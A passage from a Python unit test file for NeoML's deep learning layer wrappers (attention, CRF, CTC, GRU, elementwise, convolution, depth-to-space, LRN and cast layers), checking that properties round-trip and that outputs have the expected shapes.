    att = neoml.Dnn.MultiheadAttention((src1, src2, src3), 5, 9, 3, 0.3, "att")
    sink = neoml.Dnn.Sink(att, "sink")
    layer = net.layers['att']
    self.assertEqual(layer.name, 'att')
    # every property gets one read of the constructor value and one write/read cycle
    self.assertEqual(att.head_count, 5)
    att.head_count = 4
    self.assertEqual(att.head_count, 4)
    self.assertEqual(att.hidden_size, 9)
    att.hidden_size = 8
    self.assertEqual(att.hidden_size, 8)
    self.assertEqual(att.output_size, 3)
    att.output_size = 8
    self.assertEqual(att.output_size, 8)
    self.assertEqual(att.use_mask, False)
    att.use_mask = True
    self.assertEqual(att.use_mask, True)
    att.use_mask = False
    self.assertAlmostEqual(att.dropout_rate, 0.3, delta=1e-3)
    att.dropout_rate = 0.4
    self.assertAlmostEqual(att.dropout_rate, 0.4, delta=1e-3)
    # the net.layers proxy must reflect the final values
    self.assertEqual(layer.hidden_size, 8)
    self.assertEqual(layer.output_size, 8)
    self.assertEqual(layer.use_mask, False)
    self.assertAlmostEqual(layer.dropout_rate, 0.4, delta=1e-3)
    blob1 = neoml.Blob.asblob(engine, np.ones((4, 3, 3), dtype=np.float32), (1, 4, 3, 1, 1, 1, 3))
    blob2 = neoml.Blob.asblob(engine, np.ones((4, 2, 3), dtype=np.float32), (1, 4, 2, 1, 1, 1, 3))
    blob3 = neoml.Blob.asblob(engine, np.ones((4, 2, 2), dtype=np.float32), (1, 4, 2, 1, 1, 1, 4))
    res = net.run({"source1": blob1, "source2": blob2, "source3": blob3})["sink"].asarray()
    self.assertEqual(res.shape, (4, 3, 8))
def test_image_to_pixel(self):
    """ImageToPixel layer: smoke run, output shape matches the pixel lists."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    converter = neoml.Dnn.ImageToPixel((src1, src2), "conv")
    sink = neoml.Dnn.Sink(converter, "sink")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    blob1 = neoml.Blob.asblob(engine, np.ones((4, 3, 2), dtype=np.float32), (1, 4, 3, 1, 1, 1, 2))
    blob2 = neoml.Blob.asblob(engine, np.zeros((4, 3), dtype=np.int32), (1, 4, 1, 1, 1, 1, 3))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertEqual(res.shape, (4, 3, 2))
def test_pixel_to_image(self):
    """PixelToImage layer: height/width round-trip and drive the output image size."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    converter = neoml.Dnn.PixelToImage((src1, src2), 4, 8, "conv")
    sink = neoml.Dnn.Sink(converter, "sink")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    self.assertEqual(converter.height, 4)
    converter.height = 5
    self.assertEqual(converter.height, 5)
    self.assertEqual(converter.width, 8)
    converter.width = 9
    self.assertEqual(converter.width, 9)
    # the net.layers proxy must reflect the new sizes
    self.assertEqual(layer.height, 5)
    self.assertEqual(layer.width, 9)
    blob1 = neoml.Blob.asblob(engine, np.ones((4, 3, 2), dtype=np.float32), (1, 4, 3, 1, 1, 1, 2))
    blob2 = neoml.Blob.asblob(engine, np.zeros((4, 3), dtype=np.int32), (1, 4, 1, 1, 1, 1, 3))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertEqual(res.shape, (4, 5, 9, 2))
def test_image_resize(self):
    """ImageResize layer: deltas/default_value round-trip and pad the output image."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source1")
    resize = neoml.Dnn.ImageResize(src, [5, 6, 7, 8], 0.1, "conv")
    sink = neoml.Dnn.Sink(resize, "sink")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    self.assertEqual(resize.deltas, [5, 6, 7, 8])
    resize.deltas = [1, 2, 3, 4]
    self.assertEqual(resize.deltas, [1, 2, 3, 4])
    self.assertAlmostEqual(resize.default_value, 0.1)
    resize.default_value = 0.2
    self.assertAlmostEqual(resize.default_value, 0.2)
    # the net.layers proxy must reflect the new values
    self.assertEqual(layer.deltas, [1, 2, 3, 4])
    self.assertAlmostEqual(layer.default_value, 0.2)
    blob = neoml.Blob.asblob(engine, np.ones((2, 10, 11, 2), dtype=np.float32), (1, 1, 2, 10, 11, 1, 2))
    res = net.run({"source1": blob})["sink"].asarray()
    # height 10 + 3 + 4 == 17, width 11 + 1 + 2 == 14
    self.assertEqual(res.shape, (2, 17, 14, 2))
def test_crf(self):
    """Crf layer: properties round-trip, weight blobs survive get/set, three outputs."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    crf = neoml.Dnn.Crf((src1, src2), 5, 3, 0.3, "crf")
    sink1 = neoml.Dnn.Sink((crf, 0), "sink1")
    sink2 = neoml.Dnn.Sink((crf, 1), "sink2")
    sink3 = neoml.Dnn.Sink((crf, 2), "sink3")
    layer = net.layers['crf']
    self.assertEqual(layer.name, 'crf')
    # property write/read cycles
    self.assertEqual(crf.class_count, 5)
    crf.class_count = 7
    self.assertEqual(crf.class_count, 7)
    self.assertEqual(crf.padding, 3)
    crf.padding = 1
    self.assertEqual(crf.padding, 1)
    self.assertAlmostEqual(crf.dropout_rate, 0.3)
    crf.dropout_rate = 0.2
    self.assertAlmostEqual(crf.dropout_rate, 0.2)
    self.assertEqual(crf.calc_best_prev_class, False)
    crf.calc_best_prev_class = True
    self.assertEqual(crf.calc_best_prev_class, True)
    # the net.layers proxy must reflect the final values
    self.assertEqual(layer.class_count, 7)
    self.assertEqual(layer.padding, 1)
    self.assertAlmostEqual(layer.dropout_rate, 0.2)
    self.assertEqual(layer.calc_best_prev_class, True)
    # weight blobs can be read back and written unchanged
    crf.hidden_weights = crf.hidden_weights
    crf.free_terms = crf.free_terms
    crf.transitions = crf.transitions
    blob1 = neoml.Blob.asblob(engine, np.ones((5, 7), dtype=np.float32), (1, 1, 5, 1, 1, 1, 7))
    blob2 = neoml.Blob.asblob(engine, np.ones((5, ), dtype=np.int32), (1, 1, 5, 1, 1, 1, 1))
    results = net.run({"source1": blob1, "source2": blob2})
    self.assertEqual(results["sink1"].asarray().shape, (7,))
    self.assertEqual(results["sink2"].asarray().shape, (7,))
    self.assertEqual(results["sink3"].asarray().shape, (1,))
def test_crf_loss(self):
    """CrfLoss layer: loss_weight/max_gradient round-trip; last_loss after one run."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    src3 = neoml.Dnn.Source(net, "source3")
    loss = neoml.Dnn.CrfLoss((src1, src2, src3), 0.4, "loss")
    layer = net.layers['loss']
    self.assertEqual(layer.name, 'loss')
    self.assertAlmostEqual(loss.loss_weight, 0.4, delta=1e-3)
    loss.loss_weight = 0.6
    self.assertAlmostEqual(loss.loss_weight, 0.6, delta=1e-3)
    self.assertAlmostEqual(layer.loss_weight, 0.6, delta=1e-3)
    loss.max_gradient = 0.6
    self.assertAlmostEqual(loss.max_gradient, 0.6, delta=1e-3)
    self.assertAlmostEqual(layer.max_gradient, 0.6, delta=1e-3)
    # no run has happened yet, so the accumulated loss is still zero
    self.assertAlmostEqual(loss.last_loss, 0, delta=1e-3)
    blob1 = neoml.Blob.asblob(engine, np.ones((3, 5), dtype=np.int32), (3, 1, 5, 1, 1, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((3, 5), dtype=np.float32), (3, 1, 5, 1, 1, 1, 1))
    blob3 = neoml.Blob.asblob(engine, np.ones((3, 5), dtype=np.float32), (3, 1, 5, 1, 1, 1, 1))
    net.run({"source1": blob1, "source2": blob2, "source3": blob3})
    self.assertAlmostEqual(loss.last_loss, -2, delta=1e-3)
def test_crf_best_sequence(self):
    """BestSequence layer: all-zero class input yields the all-zero sequence."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    best = neoml.Dnn.BestSequence((src1, src2), "best")
    sink = neoml.Dnn.Sink(best, "sink")
    layer = net.layers['best']
    self.assertEqual(layer.name, 'best')
    blob1 = neoml.Blob.asblob(engine, np.zeros((3, 5), dtype=np.int32), (3, 1, 5, 1, 1, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((3, 5), dtype=np.float32), (3, 1, 5, 1, 1, 1, 1))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertTrue(np.equal(res, [0., 0., 0.]).all())
def test_ctc_loss(self):
    """CtcLoss layer: blank/loss_weight/skip round-trip; last_loss after one run."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    loss = neoml.Dnn.CtcLoss((src1, src2), 6, False, 0.4, "loss")
    layer = net.layers['loss']
    self.assertEqual(layer.name, 'loss')
    self.assertEqual(loss.blank, 6)
    loss.blank = 5
    self.assertEqual(loss.blank, 5)
    self.assertEqual(layer.blank, 5)
    self.assertAlmostEqual(loss.loss_weight, 0.4, delta=1e-3)
    loss.loss_weight = 0.6
    self.assertAlmostEqual(loss.loss_weight, 0.6, delta=1e-3)
    self.assertAlmostEqual(layer.loss_weight, 0.6, delta=1e-3)
    loss.max_gradient = 0.6
    self.assertAlmostEqual(loss.max_gradient, 0.6, delta=1e-3)
    self.assertAlmostEqual(loss.last_loss, 0, delta=1e-3)
    self.assertEqual(loss.skip, False)
    loss.skip = True
    self.assertEqual(loss.skip, True)
    # NOTE(review): the numpy array is (64, 4, 5) while the blob dims describe
    # 3*4*5 elements — looks inconsistent; confirm asblob's size handling.
    blob1 = neoml.Blob.asblob(engine, np.ones((64, 4, 5), dtype=np.float32), (3, 4, 1, 1, 1, 1, 5))
    blob2 = neoml.Blob.asblob(engine, np.ones((2, 4), dtype=np.int32), (2, 4, 1, 1, 1, 1, 1))
    net.run({"source1": blob1, "source2": blob2})
    self.assertAlmostEqual(loss.last_loss, 4.8283, delta=1e-4)
    self.assertAlmostEqual(layer.last_loss, 4.8283, delta=1e-4)
def test_ctc_decoding(self):
    """CtcDecoding layer: thresholds/blank round-trip; best sequence query; smoke run."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    decoding = neoml.Dnn.CtcDecoding((src1, src2), 5, 0.4, 0.5, "ctc")
    layer = net.layers['ctc']
    self.assertEqual(layer.name, 'ctc')
    self.assertEqual(decoding.blank, 5)
    decoding.blank = 6
    self.assertEqual(decoding.blank, 6)
    self.assertAlmostEqual(decoding.blank_threshold, 0.4, delta=1e-3)
    decoding.blank_threshold = 0.6
    self.assertAlmostEqual(decoding.blank_threshold, 0.6, delta=1e-3)
    self.assertAlmostEqual(decoding.arc_threshold, 0.5, delta=1e-3)
    decoding.arc_threshold = 0.7
    self.assertAlmostEqual(decoding.arc_threshold, 0.7, delta=1e-3)
    # before any run the input geometry is unknown
    self.assertEqual(decoding.sequence_length, 0)
    self.assertEqual(decoding.batch_width, 0)
    self.assertEqual(decoding.label_count, 0)
    self.assertAlmostEqual(layer.blank_threshold, 0.6, delta=1e-3)
    self.assertAlmostEqual(layer.arc_threshold, 0.7, delta=1e-3)
    decoding.get_best_sequence(0)
    blob1 = neoml.Blob.asblob(engine, np.ones((3, 4, 5), dtype=np.float32), (3, 4, 1, 1, 1, 1, 5))
    blob2 = neoml.Blob.asblob(engine, np.ones((4, ), dtype=np.int32), (1, 4, 1, 1, 1, 1, 1))
    net.run({"source1": blob1, "source2": blob2})
def test_gru(self):
    """Gru layer: hidden_size round-trips, weight blobs survive get/set, output shape."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source1")
    gru = neoml.Dnn.Gru((src,), 5, "gru")
    sink = neoml.Dnn.Sink(gru, "sink")
    layer = net.layers['gru']
    self.assertEqual(layer.name, 'gru')
    self.assertEqual(gru.hidden_size, 5)
    gru.hidden_size = 6
    self.assertEqual(gru.hidden_size, 6)
    self.assertEqual(layer.hidden_size, 6)
    # every weight blob can be read back and written unchanged
    gru.main_weights = gru.main_weights
    gru.main_free_term = gru.main_free_term
    gru.gate_weights = gru.gate_weights
    gru.gate_free_term = gru.gate_free_term
    blob = neoml.Blob.asblob(engine, np.ones((3, 2, 3), dtype=np.float32), (3, 2, 1, 1, 1, 1, 3))
    res = net.run({"source1": blob})["sink"].asarray()
    self.assertEqual(res.shape, (3, 2, 6))
def _test_eltwise(self, layer, check_f):
    """Run the named two-input eltwise layer on constant blobs of 3s and 2s.

    layer   -- class name inside neoml.Dnn (e.g. 'EltwiseSum')
    check_f -- predicate applied to the resulting numpy array
    """
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    eltwise = getattr(neoml.Dnn, layer)((src1, src2), "eltwise")
    sink = neoml.Dnn.Sink(eltwise, "sink")
    self.assertEqual(net.layers['eltwise'].name, 'eltwise')
    blob1 = neoml.Blob.asblob(engine, 3 * np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
    blob2 = neoml.Blob.asblob(engine, 2 * np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertTrue(check_f(res))
def test_eltwise_sum(self):
    """3 + 2 == 5 elementwise."""
    self._test_eltwise('EltwiseSum', lambda res: (res == 5).all())
def test_eltwise_sub(self):
    """3 - 2 == 1 elementwise."""
    self._test_eltwise('EltwiseSub', lambda res: (res == 1).all())
def test_eltwise_mul(self):
    """3 * 2 == 6 elementwise."""
    self._test_eltwise('EltwiseMul', lambda res: (res == 6).all())
def test_eltwise_div(self):
    """3 / 2 == 1.5 elementwise."""
    self._test_eltwise('EltwiseDiv', lambda res: (res == 1.5).all())
def test_eltwise_negmul(self):
    """(1 - 3) * 2 == -4 elementwise."""
    self._test_eltwise('EltwiseNegMul', lambda res: (res == -4).all())
def test_eltwise_max(self):
    """max(3, 2) == 3 elementwise."""
    self._test_eltwise('EltwiseMax', lambda res: (res == 3).all())
def test_conv(self):
    """Conv layer: geometry properties round-trip and both outputs are shaped right."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    conv = neoml.Dnn.Conv((src1, src2), 16, (6, 6), (7, 7), (8, 8), (9, 9), False, "conv")
    sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
    sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    # read constructor values, overwrite, and read back (also via the proxy)
    self.assertEqual(conv.filter_count, 16)
    conv.filter_count = 17
    self.assertEqual(conv.filter_count, 17)
    self.assertEqual(layer.filter_count, 17)
    self.assertEqual(conv.filter_size, (6, 6))
    self.assertEqual(layer.filter_size, (6, 6))
    conv.filter_size = (3, 3)
    self.assertEqual(conv.filter_size, (3, 3))
    self.assertEqual(conv.stride_size, (7, 7))
    conv.stride_size = (2, 2)
    self.assertEqual(conv.stride_size, (2, 2))
    self.assertEqual(layer.stride_size, (2, 2))
    self.assertEqual(conv.padding_size, (8, 8))
    conv.padding_size = (1, 1)
    self.assertEqual(conv.padding_size, (1, 1))
    self.assertEqual(conv.dilation_size, (9, 9))
    conv.dilation_size = (1, 1)
    self.assertEqual(conv.dilation_size, (1, 1))
    blob1 = neoml.Blob.asblob(engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
    results = net.run({"source1": blob1, "source2": blob2})
    self.assertEqual(results["sink1"].asarray().shape, (2, 3, 4, 3, 3, 17))
    self.assertEqual(results["sink2"].asarray().shape, (2, 3, 4, 3, 3, 17))
def test_transposed_conv(self):
    """TransposedConv layer: geometry properties round-trip; outputs are upsampled."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    conv = neoml.Dnn.TransposedConv((src1, src2), 16, (6, 6), (7, 7), (8, 8), (9, 9), False, "conv")
    sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
    sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    # read constructor values, overwrite, and read back (also via the proxy)
    self.assertEqual(conv.filter_count, 16)
    conv.filter_count = 17
    self.assertEqual(conv.filter_count, 17)
    self.assertEqual(layer.filter_count, 17)
    self.assertEqual(conv.filter_size, (6, 6))
    self.assertEqual(layer.filter_size, (6, 6))
    conv.filter_size = (3, 3)
    self.assertEqual(conv.filter_size, (3, 3))
    self.assertEqual(conv.stride_size, (7, 7))
    conv.stride_size = (2, 2)
    self.assertEqual(conv.stride_size, (2, 2))
    self.assertEqual(conv.padding_size, (8, 8))
    conv.padding_size = (1, 1)
    self.assertEqual(conv.padding_size, (1, 1))
    self.assertEqual(conv.dilation_size, (9, 9))
    conv.dilation_size = (1, 1)
    self.assertEqual(conv.dilation_size, (1, 1))
    blob1 = neoml.Blob.asblob(engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
    results = net.run({"source1": blob1, "source2": blob2})
    self.assertEqual(results["sink1"].asarray().shape, (2, 3, 4, 9, 9, 17))
    self.assertEqual(results["sink2"].asarray().shape, (2, 3, 4, 9, 9, 17))
def test_channelwise_conv(self):
    """ChannelwiseConv layer: geometry round-trips; channel count is preserved."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    conv = neoml.Dnn.ChannelwiseConv((src1, src2), 16, (6, 6), (7, 7), (8, 8), False, "conv")
    sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
    sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    # read constructor values, overwrite, and read back (also via the proxy)
    self.assertEqual(conv.filter_count, 16)
    conv.filter_count = 17
    self.assertEqual(conv.filter_count, 17)
    self.assertEqual(layer.filter_count, 17)
    self.assertEqual(conv.filter_size, (6, 6))
    self.assertEqual(layer.filter_size, (6, 6))
    conv.filter_size = (3, 3)
    self.assertEqual(conv.filter_size, (3, 3))
    self.assertEqual(conv.stride_size, (7, 7))
    conv.stride_size = (2, 2)
    self.assertEqual(conv.stride_size, (2, 2))
    self.assertEqual(conv.padding_size, (8, 8))
    conv.padding_size = (1, 1)
    self.assertEqual(conv.padding_size, (1, 1))
    blob1 = neoml.Blob.asblob(engine, np.ones((2, 3, 4, 5, 5, 7), dtype=np.float32), (2, 3, 4, 5, 5, 1, 7))
    blob2 = neoml.Blob.asblob(engine, np.ones((2, 3, 4, 5, 5, 7), dtype=np.float32), (2, 3, 4, 5, 5, 1, 7))
    results = net.run({"source1": blob1, "source2": blob2})
    self.assertEqual(results["sink1"].asarray().shape, (2, 3, 4, 3, 3, 7))
    self.assertEqual(results["sink2"].asarray().shape, (2, 3, 4, 3, 3, 7))
def test_time_conv(self):
    """TimeConv layer: scalar geometry properties round-trip; output is (3, 8)."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    conv = neoml.Dnn.TimeConv((src1, src2), 16, 6, 7, 8, 19, 9, "conv")
    sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
    sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    # read constructor values, overwrite, and read back (also via the proxy)
    self.assertEqual(conv.filter_count, 16)
    conv.filter_count = 8
    self.assertEqual(conv.filter_count, 8)
    self.assertEqual(layer.filter_count, 8)
    self.assertEqual(conv.filter_size, 6)
    self.assertEqual(layer.filter_size, 6)
    conv.filter_size = 3
    self.assertEqual(conv.filter_size, 3)
    self.assertEqual(conv.padding_front, 7)
    conv.padding_front = 2
    self.assertEqual(conv.padding_front, 2)
    self.assertEqual(conv.padding_back, 8)
    conv.padding_back = 2
    self.assertEqual(conv.padding_back, 2)
    self.assertEqual(layer.padding_back, 2)
    self.assertEqual(conv.stride, 9)
    conv.stride = 3
    self.assertEqual(conv.stride, 3)
    self.assertEqual(conv.dilation, 19)
    self.assertEqual(layer.dilation, 19)
    conv.dilation = 5
    self.assertEqual(conv.dilation, 5)
    blob1 = neoml.Blob.asblob(engine, np.ones((9, 3, 3, 3), dtype=np.float32), (9, 3, 1, 3, 3, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((9, 3, 3, 3), dtype=np.float32), (9, 3, 1, 3, 3, 1, 1))
    results = net.run({"source1": blob1, "source2": blob2})
    self.assertEqual(results["sink1"].asarray().shape, (3, 8))
    self.assertEqual(results["sink2"].asarray().shape, (3, 8))
def test_conv3d(self):
    """Conv3D layer: 3-tuple geometry properties round-trip; both outputs shaped right."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    conv = neoml.Dnn.Conv3D((src1, src2), 16, (8, 6, 2), (9, 7, 2), (8, 8, 4), False, "conv")
    sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
    sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
    layer = net.layers['conv']
    self.assertEqual(layer.name, 'conv')
    # read constructor values, overwrite, and read back (also via the proxy)
    self.assertEqual(conv.filter_count, 16)
    self.assertEqual(layer.filter_count, 16)
    conv.filter_count = 7
    self.assertEqual(conv.filter_count, 7)
    self.assertEqual(conv.filter_size, (8, 6, 2))
    conv.filter_size = (4, 3, 2)
    self.assertEqual(conv.filter_size, (4, 3, 2))
    self.assertEqual(layer.filter_size, (4, 3, 2))
    self.assertEqual(conv.stride_size, (9, 7, 2))
    conv.stride_size = (2, 2, 3)
    self.assertEqual(conv.stride_size, (2, 2, 3))
    self.assertEqual(conv.padding_size, (8, 8, 4))
    conv.padding_size = (2, 1, 1)
    self.assertEqual(conv.padding_size, (2, 1, 1))
    blob1 = neoml.Blob.asblob(engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
    results = net.run({"source1": blob1, "source2": blob2})
    self.assertEqual(results["sink1"].asarray().shape, (9, 3, 5, 3, 2, 7))
    self.assertEqual(results["sink2"].asarray().shape, (9, 3, 5, 3, 2, 7))
    def test_transposedconv3d(self):
        """TransposedConv3D: same property round-trip checks as test_conv3d,
        but the output spatial dims grow instead of shrink.
        """
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        source2 = neoml.Dnn.Source(dnn, "source2")
        # filter_count=16, filter_size=(8,6,2), stride=(9,7,2), padding=(8,8,4), no free term.
        conv = neoml.Dnn.TransposedConv3D((source1, source2), 16, (8, 6, 2), (9, 7, 2), (8, 8, 4), False, "conv")
        sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
        sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
        # Same layer viewed through the net's layer dictionary.
        layer = dnn.layers['conv']
        self.assertEqual(layer.name, 'conv')
        self.assertEqual(conv.filter_count, 16)
        self.assertEqual(layer.filter_count, 16)
        conv.filter_count = 7
        self.assertEqual(conv.filter_count, 7)
        self.assertEqual(conv.filter_size, (8, 6, 2))
        conv.filter_size = (4, 3, 2)
        self.assertEqual(conv.filter_size, (4, 3, 2))
        self.assertEqual(layer.filter_size, (4, 3, 2))
        self.assertEqual(conv.stride_size, (9, 7, 2))
        conv.stride_size = (2, 2, 3)
        self.assertEqual(conv.stride_size, (2, 2, 3))
        self.assertEqual(conv.padding_size, (8, 8, 4))
        conv.padding_size = (2, 1, 1)
        self.assertEqual(conv.padding_size, (2, 1, 1))
        input1 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
        input2 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
        inputs = {"source1": input1, "source2": input2}
        outputs = dnn.run(inputs)
        out1 = outputs["sink1"].asarray()
        out2 = outputs["sink2"].asarray()
        # Transposed convolution upsamples: spatial dims expand under the changed params.
        self.assertEqual(out1.shape, (9, 3, 14, 11, 9, 7))
        self.assertEqual(out2.shape, (9, 3, 14, 11, 9, 7))
def test_depthtospace(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
depth_to_space = neoml.Dnn.DepthToSpace(source, block_size=3, name='depth_to_space')
sink = neoml.Dnn.Sink(depth_to_space, 'sink')
self.assertEqual(depth_to_space.name, 'depth_to_space')
self.assertEqual(depth_to_space.block_size, 3)
depth_to_space.block_size = 2
self.assertEqual(depth_to_space.block_size, 2)
input_blob = neoml.Blob.asblob(math_engine, np.ones((2, 3, 5, 4, 8, 12), dtype=np.float32), (2, 3, 5, 4, 8, 1, 12))
outputs = dnn.run({'source' : input_blob})
out = outputs['sink'].asarray()
self.assertEqual(out.shape, (2, 3, 5, 8, 16, 3))
def test_spacetodepth(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
space_to_depth = neoml.Dnn.SpaceToDepth(source, block_size=3, name='space_to_depth')
sink = neoml.Dnn.Sink(space_to_depth, 'sink')
self.assertEqual(space_to_depth.name, 'space_to_depth')
self.assertEqual(space_to_depth.block_size, 3)
space_to_depth.block_size = 2
self.assertEqual(space_to_depth.block_size, 2)
input_blob = neoml.Blob.asblob(math_engine, np.ones((2, 3, 5, 4, 8, 12), dtype=np.float32), (2, 3, 5, 4, 8, 1, 12))
outputs = dnn.run({'source' : input_blob})
out = outputs['sink'].asarray()
self.assertEqual(out.shape, (2, 3, 5, 2, 4, 48))
def test_lrn(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
lrn = neoml.Dnn.Lrn(source, window_size=3, bias=-2., alpha=0.456, beta=0.123, name='lrn')
sink = neoml.Dnn.Sink(lrn, 'sink')
self.assertEqual(lrn.name, 'lrn')
self.assertEqual(lrn.window_size, 3)
self.assertAlmostEqual(lrn.bias, -2., delta=1e-5)
self.assertAlmostEqual(lrn.alpha, 0.456, delta=1e-5)
self.assertAlmostEqual(lrn.beta, 0.123, delta=1e-5)
input_blob = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 6, 7, 8), dtype=np.float32), (2, 3, 4, 5, 6, 7, 8))
outputs = dnn.run({'source': input_blob})
out = outputs['sink'].asarray()
self.assertEqual(out.shape, (2, 3, 4, 5, 6, 7, 8))
def _test_cast_impl(self, type_from, type_to):
def generate_array(type):
np_type = np.float32 if type == 'float' else np.int32
return np.arange(5, dtype=np_type)
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
cast = neoml.Dnn.Cast(source, output_type=type_to)
sink = neoml.Dnn.Sink(cast, 'sink')
input_arr = generate_array(type_from)
input_blob = neoml.Blob.asblob(math_engine, input_arr, (1, 1, 1, 1, 1, 1, len(input_arr)))
outputs = dnn.run({'source': input_blob})
actual = outputs['sink'].asarray()
expected = generate_array(type_to)
self.assertEqual(actual.dtype, expected.dtype)
self.assertTrue(np.equal(actual, expected).all())
def test_cast(self):
types = ['int', 'float']
for type_from in types:
for type_to in types:
self._test_cast_impl(type_from, type_to)
class PoolingTestCase(MultithreadedTestCase):
    """Tests for the pooling layers plus assorted layer wrappers
    (normalization, positional embeddings, sequence utilities, RNN cells).
    """
    def _test_pooling(self, layer, init_params=None, changed_params=None,
                      input_shape=(2, 1, 2, 3, 5, 4, 2)):
        """Create pooling layer `layer` with `init_params`, verify the params
        round-trip, apply `changed_params`, then run the net on an all-ones
        blob of `input_shape` and return the output array.
        """
        # None sentinels instead of mutable default arguments ({} defaults
        # are shared across calls).
        init_params = {} if init_params is None else init_params
        changed_params = {} if changed_params is None else changed_params
        math_engine = neoml.MathEngine.CpuMathEngine(1)
